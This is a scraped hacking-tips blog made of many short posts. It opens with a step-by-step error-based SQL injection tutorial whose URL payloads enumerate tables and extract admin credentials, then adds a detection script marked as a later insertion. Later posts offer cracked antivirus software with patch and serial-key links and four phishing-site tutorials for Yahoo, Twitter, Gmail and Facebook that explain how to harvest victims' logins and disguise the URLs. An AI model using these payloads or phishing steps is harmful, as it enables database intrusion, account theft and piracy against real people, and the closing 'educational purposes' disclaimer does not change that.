Hacking ASP/ASPX Websites - SQL Injection


Hacking ASP/ASPX sites
SQL injection against ASP/ASPX sites is similar to PHP-based SQL injection. But here we don't use queries that contain order by, union select, etc. Instead, we trick the server into responding with the information we need. It is an error-based injection technique: the information comes back in the form of error messages.



Step 1: Find Out A Vulnerable Link
First, we need to find a vulnerable asp/aspx link, which looks like
www.vulnerablesite.com/gallery.aspx?id=10
When I browse my actual link, I get the page as shown in the figure.


Step 2: Checking For Vulnerability

As in the PHP based injection, we will test for the vulnerability by adding a single quote at the end of the URL.
www.vulnerablesite.com/gallery.aspx?id=10'
If it gives an error similar to the following, then our site is vulnerable to SQL injection.



In asp/aspx based injections, we do not need to find out the number of columns or the most vulnerable column. We directly find out the table names and column names, and then we extract the data.


Step 3: Finding Out The Table Names.
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 table_name from information_schema.tables))
The above code executes the second query and retrieves the first table name from the database. The Windows server can't convert the character value to the int data type, so we get an error, as shown in the following figure, from which we can read the first table name.


But this may not be the desired table for us. So we need to find out the next table name in the database.

For that, we will use the following query.
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('first_table_name')))
Replace first_table_name with the actual table name we got above.



Now we will get the second table name, as shown in the figure. If we still don't get our desired table, we continue the procedure until we get the desired table name. Now the query looks like
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('first_table_name','second_table_name')))
Replace first_table_name and second_table_name with the table names we got in the above steps.



Step 4: Finding Out The Columns

Now we have got the admin table, so we need to find out its columns.
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='admin_table'))

Replace admin_table with the table name we got. In our case, it is "vw_system_admin"



If the first column is not one of our desired columns, then follow the same procedure as in Step 3.
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='admin_table' and column_name not in ('first_column_name')))

Replace first_column_name with the column name we got.




Step 5: Extracting The Data

After finding out all the columns, we need to extract the data such as user names and passwords.

For that, we use the following query

For user name,
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_username from admin_table))



For password,
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_username from admin_table))

Hope this info helped you. For further doubts and clarifications, please leave your comments.
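A defender's view of the requests in Steps 2 to 5, as an added example that is not part of the original post: a Python scan of IIS W3C logs for the single-quote test and the convert(int,(select ...)) pattern, flagging clients whose probes were answered with HTTP 500. The log lines, IP addresses, field layout and rule names are constructed for illustration.

```python
"""Flag error-based SQL injection probes (CONVERT/CAST over a subquery) in IIS W3C logs."""
import re
from urllib.parse import unquote_plus

# Constructed sample log in W3C extended format; hosts and addresses are placeholders.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2012-01-20 10:00:01 GET /gallery.aspx id=10 203.0.113.5 200
2012-01-20 10:00:07 GET /gallery.aspx id=10' 203.0.113.9 500
2012-01-20 10:00:15 GET /gallery.aspx id=10+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables)) 203.0.113.9 500
2012-01-20 10:00:21 GET /gallery.aspx id=10%20AND%201%3DCONVERT%28int%2C%28SELECT%20TOP%201%20column_name%20FROM%20information_schema.columns%29%29 203.0.113.9 500
2012-01-20 10:00:30 GET /search.aspx q=convert+int+to+string 198.51.100.7 200
"""

# Rule names are chosen for this example.
RULES = {
    # A type conversion wrapped around a subquery: the error-based leak primitive.
    "conversion_probe": re.compile(
        r"(?:convert\s*\(\s*\w+\s*,|cast\s*\()\s*\(\s*select\b", re.I),
    # Reads of the catalogue views used to list tables and columns.
    "schema_enumeration": re.compile(
        r"information_schema\s*\.\s*(?:tables|columns)", re.I),
}


def decode(query):
    """URL-decode up to three times so double-encoded payloads still match."""
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query


def scan(log_text):
    """Return one finding per log line whose query string matches a rule."""
    fields, findings = [], []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the rows below
            continue
        if not line or line.startswith("#"):
            continue
        row = dict(zip(fields, line.split()))
        query = decode(row.get("cs-uri-query", "-"))
        hits = [name for name, rx in RULES.items() if rx.search(query)]
        if query.count("'") % 2 == 1:          # the single-quote test from Step 2
            hits.append("unbalanced_quote")
        if hits:
            findings.append({"line": line_no, "client": row.get("c-ip"),
                             "status": row.get("sc-status"), "rules": hits})
    return findings


def likely_leaks(findings):
    """Clients whose conversion probe got a 500, i.e. an error page was returned."""
    return sorted({f["client"] for f in findings
                   if "conversion_probe" in f["rules"] and f["status"] == "500"})


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for finding in results:
        print(finding)
    print("error page returned to:", likely_leaks(results))
```

A conversion probe answered with status 500 means the database error text probably reached the client. Parameterised queries and generic error pages (ASP.NET customErrors) remove both the injection point and the leak.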

Katana: Portable Multi-Boot Security Suite

 


Katana is a package that brings about 100 different legends of hacking together in just one pack. It is amazing that all these tools are portable and you do not even need to download them. It includes distributions which focus on Pen-Testing, Auditing, Forensics, System Recovery, Network Analysis, and Malware Removal.









Katana Tool Kit:
  •  Metasploit
  • Wireshark
  • NMAP
  • John the Ripper
  • Cain & Abel
  • Firefox
  • PuTTY
  • the Unstoppable Copier
  • OllyDBG
  • Cygwin
  • ClamAV
  • IECookiesView
  • MozillaCacheView
  • FreeOTFE
  • FindSSN
  • The Sleuth Kit
  • OpenOffice

Insert your friends picture in Facebook Chat.

Recently I was informed by my very good friend of this great trick with which you can add the picture of literally anyone in the Facebook chat. At first the trick only had :putnam:, which would show a small face, but now there is something more cool in town ;)

TUTORIAL:

Step 1: Go to the profile of the user or page whose picture you want to add.

Step 2: Copy the Username or Profile ID from the page. Ex: https://www.facebook.com/pages/Hot-Tech-Tips/147390308674525?sk=wall or http://www.facebook.com/profile.php?id=0000000000

Step 3: Now go to the chat and paste this username or profile ID inside double square brackets. Ex: [[hottechtips]]

                                       

Step 4: Now press Enter and the Profile picture of that user or page will go to other person.


Hope you liked this Trick, for long lasting fun subscribe or like my FB page https://www.facebook.com/pages/Hot-Tech-Tips/147390308674525?sk=wall

Where is telnet in Windows 7 ?

Recently I was playing with the command prompt and noticed that the Telnet Client is not enabled in Windows 7, so I decided to write this small tutorial to tell you how to enable it.

Step 1: Click on Start Button.

Step 2: Go to Control Panel.

Step 3: Now go to Programs and Features.

Step 4: Now open Turn Windows features on or off.

Step 5: Here enable the telnet client.

BitDefender Total Security 2012 [Crack] [Free] [Final]


BitDefender Total Security 2012 Build 15.0.34.1416 Final | 460MB

BitDefender Total Security 2012 - comprehensive protection against viruses, spyware, hacker attacks and other cyber threats that could lead to identity theft, data loss and decreased performance. BitDefender Total Security is the first among its competitors due to effective protection against spam and viruses, robust firewalling and the availability of tools to optimize and backup systems in one package.
BitDefender Total Security 2012 provides a special kind of quiet protection regime, Autopilot: no pop-ups, no settings, does not interrupt your activity on the computer.

Antivirus, antispyware, anti-phishing, firewall, parental controls, integrated, safe social networking, remote control functions. Total Security includes functions - file encryption, data backup, configure, and optimize the system.
The main components of BitDefender Total Security 2012
• Antivirus and antispyware
• Phishing
• Secure Search
• A quick scan
• Control your home network
• Encrypt chats
• Privacy in social networks
• Antispam
• Firewall
• Parental Control
• Encryption of files
• Optimization of
• Destruction of files
• Online backup (2GB)
New in BitDefender Total Security 2012
• Autopilot
Autopilot mode provides optimum security without user intervention. That means - no pop-ups and alerts do not need to configure anything.
• Scan Manager
Scan Manager finds and uses the time intervals when the system utilization is below a certain threshold, perform repetitive inspections for your entire system. Thus, BitDefender does not interfere with user tasks and has no effect on system performance.
• Recovery Mode
If Internet-based threats such as rootkits, can not be removed as part of Windows, your computer downloads in recovery mode a trusted environment that is used for cleaning and restoration.
• Integrated cloud services
The global exchange of data in real time between the servers and BitDefender BitDefender 2012 products ensures rapid identification of emerging internet threats such as epidemics and large flows of spam.
• Synchronize the files
BitDefender Total Security 2012 offers space Safebox, which allows you to synchronize files between your computers (for example, between your desktop and laptop). Changes made in one system are automatically applied to other systems.
• Online Backup
Updated online backup monitor tracks the status of your important files and copies them instantly to a secure remote server. BitDefender Total Security 2012 comes with 2GB of online storage.
• Safety on social networks
Has a function to prevent Internet threats specific to social networks, by scanning the references received from friends from Facebook and Twitter, by controlling the privacy settings and much more.
• Customizable interface
Drag-and-drop modules that allow you to access the most frequently performed operations directly from the main window.
• Simplified installation
BitDefender Total Security 2012 is installed in a few clicks, taking up half the time required for the previous version.
On the file:
Language: English
File format: rar
Platform / OS: XP, Vista, 7 



DOWNLOAD:

BITDEFENDER TOTAL SECURITY 2012 (32 Bit = 228 MB)
http://download.bitdefender.com/windows/desktop/t_security/2012/en-us/bitdefender_ts_2012_32b.exe


BITDEFENDER TOTAL SECURITY 2012 (64 Bit = 248 MB)
http://download.bitdefender.com/windows/desktop/t_security/2012/en-us/bitdefender_ts_2012_64b.exe
PATCH:

http://www.fileserve.com/file/QKv72jj

http://rapidshare.com/files/457094837/Box_BD2011_3.1.rar

http://www.wupload.com/file/7800553/Box_BD2011_3.1.rar

Avira Antivirus Premium 2012 12.0.0.865 [Final] [Crack] [Serial Key]




Avira AntiVir Premium reliably protects you against all threats from viruses, worms, trojans, rootkits, phishings, adware, spyware, bots and dangerous “drive-by” downloads. Best detection rates and top-class security with several updates every day. Advanced protection:
Includes basic antivirus protection PLUS: email protection (POP3), AntiPhishing, AntiSpyware, AntiAdware and more. With real-time on-access scanning, profile-based on-demand scans and scheduling of full system scanning and updates it offers premium protection. It includes a POP3 based MailScanner that scans emails before they are stored on your machine. With a user-friendly control center, quarantine management, fast performance and world leading detection rates the Avira AntiVir Premium provides essential protection for your PC.

AntiVir Personal offers effective protection against computer viruses for the individual and private use on a single PC-workstation. It detects and removes viruses and includes an Internet-Update Wizard for easy updating.


Avira presents the Premium Security Suite with Full protection: Includes basic and advanced antivirus protection, email protection, AntiPhishing, Anti-Spyware and Anti-Adware PLUS: Anti-Spam, Firewall, WebGuard (Safe Surfing), Game Mode and more.! Complete security for workstations! The repeatedly awarded and worldwide used virus and malware protection by over 30 million users now also with WebGuard!
Avira is a German antivirus software company. Its antivirus applications are based on the AntiVir antivirus engine, first launched in 1988. It was called "H+BEDV Datentechnik GmbH" when it was founded. One of the antivirus software, AntiVir Personal, is free for personal usage. Avira is launching a new, comprehensive protection package for end-users as well as small offices and home workers: the Avira Premium Security Suite is a combination of Avira’s brand-new firewall and the proven anti-virus software AntiVir Personal Premium.

Even less experienced users can cope with the numerous security threats from the Internet with the central, intuitively operated user interface of the Suite
 


Serials Works Till 21.1.2012 (Will Update It) 




Operating systems : 


Works On 32bit/64bit 


Download Links : 


Avira Antivirus Premium



http://premium.avira-update.com/package/wks_avira/win32/en/pepr/avira_antivirus_premium_en.exe


Serial Keys:


http://rapidshare.com/files/2339055374/Avira_New_Keys.rar




INSTRUCTIONS:


Download Avira Premium Antivirus 2012 from their official site and open it. While installing, where it asks for a key, upload any of the Avira keys that you have downloaded from here, and just let it install. BUT REMEMBER: TURN OFF YOUR INTERNET, OTHERWISE IT WON'T WORK!

Watch Star Wars on telnet.

This is a very interesting and amazing command prompt trick which will play the Star Wars movie in the command prompt (cmd). Below are the complete steps for this trick, with screenshots. Without wasting time, let's get started.


       1. Go to start > Run and type in cmd and press enter
       2. Now type in telnet as shown below and press enter.



       3. After that enter o as shown below and press enter.


       4. Next enter towel.blinkenlights.nl as shown below and press enter.

       5. Now star wars movie will start playing on your command prompt.


via: http://www.learntricks.in/2012/01/watch-star-wars-movie-in-cmd.htm

Anonymous Changes DDoS Tactics in Megaupload Retaliation

Anonymous' army of hacktivists have changed tactics in what some are calling an attempt to trick people into participating in distributed denial-of-service (DDoS) attacks.
A round of DDoS attacks Thursday were launched in retaliation for the federal crackdown on Megaupload, a popular file-sharing site sometimes used to distribute pirated material. Law enforcement officials from the United States and other countries moved against a number of people Thursday that were named in an indictment returned earlier this month in federal court in Virginia. The indictment names seven men and two corporations – Megaupload Limited and Vestor Limited – and accuses them of engaging in a racketeering conspiracy, conspiring to commit copyright infringement, conspiring to commit money laundering and two substantive counts of criminal copyright infringement.
In response to the crackdown, Anonymous launched attacks against websites belonging to the U.S. Department of Justice, FBI, Recording Industry Association of America and others.


“In the past, Anonymous has encouraged supporters to install a program called LOIC (Low Orbit Ion Cannon) which allows computers to join in an attack on a particular website, blasting it with unwanted traffic,” Sophos Senior Technology Consultant Graham Cluley noted in a blog post. “This time, things are slightly different: you only have to click on a web link to launch a DDoS attack.”
According to Cluley, members of Anonymous used Twitter to post links that, when clicked, automatically made people part of an attack.
“We've seen many links posted on Twitter, and no doubt elsewhere on the internet, pointing to a page on the pastehtml.com website,” he explained. “If you visit the webpage, and do not have JavaScript disabled, you will instantly, without user interaction, begin to flood a website of Anonymous's choice with unwanted traffic, helping to perpetuate a DDoS attack.”
Cluley argued the change in tactics might be because it could allow anyone prosecuted to claim they were unknowing participants. In late 2010 and throughout 2011, several hacktivists associated with Anonymous were arrested around the world.
“Don't forget, denial-of-service attacks are illegal,” he wrote. “If you participate in such an attack you could find yourself receiving a lengthy jail sentence.”
Commenting on this Article will be automatically closed on April 21, 2012.

ESET NOD32 Antivirus 5 [Full] [Free] [Crack]


Built on the award-winning ThreatSense engine, ESET NOD32 Antivirus proactively detects and disables more viruses, trojans, worms, adware, spyware, phishing, rootkits and other Internet threats than any program available. ESET NOD32 Antivirus provides:
Proactive Protection: The award winning ThreatSense technology combines multiple layers of detection protecting you from Internet threats before it is too late.
Precise Detection: ESET accurately identifies known and unknown threats. It consistently wins top awards from testing labs and is recognized for having zero false positives.
Lightweight Design: Requires less memory and CPU power, allowing your computer to run fast, making more room for games, web browsing, and emailing.
Fast Scanning Speeds: Highly efficient program ensuring fast file scanning and product updates. It runs quietly in the background.
Proactive, precise, lightweight and fast. You won't find a better antivirus program.

DOWNLOAD:


http://www.megaupload.com/?d=7B83RSMM

http://bc.vc/PDIfZ

Norton Internet Security 2012 + Antivirus [Lifetime licence] [Full] [Crack]

Key Technologies: 
• Anti Virus 
• Anti Rootkit 
• Bot Protection 
• Norton™ Safe Web 
• Smart Firewall 
• NEW! SONAR™ 2 Behavioral Protection 
• NEW! Norton System Insight 
• NEW! Norton Insight Network AntiSpam 
• NEW! Norton Download Insight 
• NEW! Norton Threat Insight 
• Spyware Protection 
• Identity Protection 
• Pulse Updates 
• Network Monitoring 
• Parental Controls 
• Vulnerability Protection 
• NEW! Professional Strength AntiSpam 
• NEW! Norton File Insight 

Key Benefits: 
• NEW Delivers clear threat and performance explanations—Gives you greater insight into downloaded applications and files by telling you where they came from, if they can be trusted, and how they may impact your PC’s resources and performance. 
• NEW Identifies unsafe web sites right in your search results—Warns you of dangerous web sites and suspicious sellers so you can surf and shop online with confidence. 
• IMPROVED! Stops online identity theft, viruses, spyware, bots and more—Guards your PC, online activities, and your identity against all types of Internet threats. 
• IMPROVED! Stops attacks before they get on your PC—Proactively blocks hackers and prevents dangerous software from downloading to your computer when you surf the web. 
• Uses intelligence-driven Norton Insight Network for faster, fewer, shorter scans—Detects and eliminates dangerous software with the shortest scan times of any security product. 

Norton Internet Security + Norton Antivirus + Crack 

Download links: 


http://www.fileserve.com/file/7YevqYD/Norton.IS.AV.2012.19.part1.rar 
http://www.fileserve.com/file/dEgNtVk/Norton.IS.AV.2012.19.part2.rar

Making Yahoo Phishing Site Tutorial

Hack Yahoo Accounts.

OK friends, today I am going to show you how to make the Yahoo! phishing site, with which you can easily hack your friends and fellows; you just have to copy the following steps.


Step 1: The first step in making the site is to register an account at http://www.p4o.net/signup.php (if you already have an account, then you can skip the first 2 steps)



Step 2: Now Goto your email account that you gave and confirm your account with confirmation link

Step 3: Now download this file (http://bc.vc/ROT0C).

Step 4: Now Goto http://www.p4o.net/login.php and Log into your account.

Step 5: Now when you are logged into your account click on the Online File Manager under File Management.

Step 6: Now Click on the htdocs and then on Upload Button.

Step 7: Now choose the file under the Archives that you have downloaded, to be uploaded.

Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.


NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:

http://www.yoursitesadress.p4o.net/lol.txt



If I am not clear in any point Please ask me in comments below.
THE DOWNLOAD LINK TO Yahoo.zip is http://www.mediafire.com/?jawqf7dyg0iwn3x

Making Twitter Phishing Site Tutorial

Hack Twitter Tutorial.
Yeah! Today it is Twitter's turn. I am going to show you how to make the Twitter phishing site, with which you can hack any Twitter account ;)


Step 1: The first step in making the site is to register an account at http://www.p4o.net/signup.php (if you already have an account, then you can skip the first 2 steps)




Step 2: Now Goto your email account that you gave and confirm your account with confirmation link


Step 3: Now download this file (http://bc.vc/JC46Q).


Step 4: Now Goto http://www.p4o.net/login.php and Log into your account.


Step 5: Now when you are logged into your account click on the Online File Manager under File Management.

Step 6: Now Click on the htdocs and then on Upload Button.

Step 7: Now choose the file under the Archives that you have downloaded, to be uploaded.

Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.




NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:


http://www.yoursitesadress.p4o.net/lol.txt



If I am not clear in any point Please ask me in comments below.
THE DOWNLOAD LINK TO twitter.zip is http://www.mediafire.com/?dxpzo20d0fw2n8a

How to Hack Gmail account using Phishing.



Step 1: The first step in making the site is to register an account at http://www.000webhost.com/order.php (if you already have an account, then you can skip the first 2 steps)



Step 2: Now Goto your email account that you gave and confirm your account with confirmation link


Step 3: Now Download this FILE (http://www.filesonic.com/file/4165336855/Gmail-Phishing-site.zip ) .


Step 4: Now Goto http://members.000webhost.com/ and Log into your account.



Step 5: Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it.

Step 6: Now Click on the Public_html.


Step 7: Now click on the Upload button, choose the file under the Archives that you have downloaded, to be uploaded.


Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.




NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:


http://www.yoursitesadress.p4o.net/lol.html



If I am not clear in any point Please ask me in comments below.
THE DOWNLOAD LINK TO Gmail-phishing-site.zip is http://www.filesonic.com/file/4165336855/Gmail-Phishing-site.zip

Making Facebook Phishing Site Tutorial.




Step 1: The first step in making the site is to register an account at http://www.000webhost.com/order.php (if you already have an account, then you can skip the first 2 steps)



Step 2: Now Goto your email account that you gave and confirm your account with confirmation link


Step 3: Now Download this FILE (http://www.filesonic.pk/file/4163700355/Facebook-Phishing-Site.zip ) .

Step 4: Now Goto http://members.000webhost.com/ and Log into your account.



Step 5: Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it.


Step 6: Now Click on the Public_html.



Step 7: Now click on the Upload button, choose the file under the Archives that you have downloaded, to be uploaded.

Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.




NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:


http://www.yoursitesadress.p4o.net/lol.html


If I am not clear in any point Please ask me in comments below.
THE DOWNLOAD LINK TO facebook.zip is http://www.filesonic.pk/file/4163700355/Facebook-Phishing-Site.zip
PS: If www.p4o.net didn't work for you, you can use:
www.drivehq.com
www.yourfreehosting.net
www.esmartstart.com

=============================================================
The Input Data (Email and Password) will look like following:

==============================================================
UPDATE:
Now if you have successfully made the Phishing page (site), then you must know that on Facebook you cannot post it, mail it, or send it in chat, e.g. www.yoursite.p4o.net. This is because Facebook doesn't allow the T35.com sites. So the solution to this problem is to use http://www.dot.tk for the URL hiding.
All you have to do is go to http://www.dot.tk, enter your Phisher's address on the main page and get a domain for that. For example, for www.myphisher.p4o.net you get www.myphisher.tk, and Facebook will allow you to post it.

DISCLAIMER

The information provided on hottechtips.blogspot.com is to be used for educational purposes only. The website creator is in no way responsible for any misuse of the information provided. All of the information in this website is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word “Hack” or “Hacking” on hottechtips.blogspot.com should be regarded as “Ethical Hack” or “Ethical hacking” respectively. You implement the information given at your own risk.